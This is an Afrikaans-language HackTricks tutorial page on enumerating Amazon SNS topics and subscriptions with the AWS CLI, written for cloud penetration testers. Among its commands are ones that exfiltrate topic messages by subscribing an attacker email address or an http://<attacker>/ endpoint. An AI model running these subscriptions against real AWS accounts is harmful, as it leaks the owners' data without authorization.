Afrikaans - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - SNS Enum

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

SNS

Amazon Simple Notification Service (Amazon SNS) word beskryf as 'n ten volle bestuurde boodskapdiens. Dit ondersteun beide toepassing-tot-toepassing (A2A) en toepassing-tot-persoon (A2P) kommunikasietipes.

Belangrike kenmerke vir A2A kommunikasie sluit in publiseer/inteken (pub/sub) meganismes. Hierdie meganismes stel onderwerpe in, wat noodsaaklik is vir die moontlikheid van hoë-deurset, druk-gebaseerde, vele-tot-vele boodskappe. Hierdie kenmerk is baie voordelig in scenario's wat verspreide stelsels, mikrodienste, en gebeurtenisgedrewe bedienerlose argitekture behels. Deur van hierdie onderwerpe gebruik te maak, kan publiseerstelsels boodskappe doeltreffend versprei na 'n wye verskeidenheid intekenaarstelsels, wat 'n waaiervormige boodskappatroon fasiliteer.

Verskil met SQS

SQS is 'n gebaseerde koeueue-diens wat punt-tot-punt kommunikasie moontlik maak, en verseker dat boodskappe deur 'n enkele verbruiker verwerk word. Dit bied ten minste een keer aflewering, ondersteun standaard en FIFO-koeueue, en maak boodskapretensie vir herpogings en vertraagde verwerking moontlik. Aan die ander kant is SNS 'n publiseer/inteken-gebaseerde diens, wat een-tot-vele kommunikasie moontlik maak deur boodskappe na meervoudige intekenaars gelyktydig uit te saai. Dit ondersteun verskeie intekeningseindpunte soos e-pos, SMS, Lambda-funksies, en HTTP/HTTPS, en bied filtermeganismes vir geteikende boodskapaflewering. Terwyl beide dienste ontkoppeling tussen komponente in verspreide stelsels moontlik maak, fokus SQS op gekoeueue kommunikasie, en beklemtoon SNS gebeurtenisgedrewe, waaiervormige kommunikasiepatrone.

Opsomming

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>

Let wel dat as die onderwerp van die tipe FIFO is, kan slegs intekenaars wat die protokol SQS gebruik, gebruik word (HTTP of HTTPS kan nie gebruik word nie).

Selfs as die --topic-arn die streek bevat, moet jy seker maak dat jy die korrekte streek in --region spesifiseer, anders sal jy 'n fout kry wat lyk asof jy nie toegang het nie, maar die probleem is die streek.

Ongeagte Toegang

pageAWS - SNS Unauthenticated Enum

Voorregverhoging

pageAWS - SNS Privesc

Na-Exploitasie

pageAWS - SNS Post Exploitation

Volharding

pageAWS - SNS Persistence

Verwysings

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

PreviousAWS - SES EnumNextAWS - SQS Enum

Last updated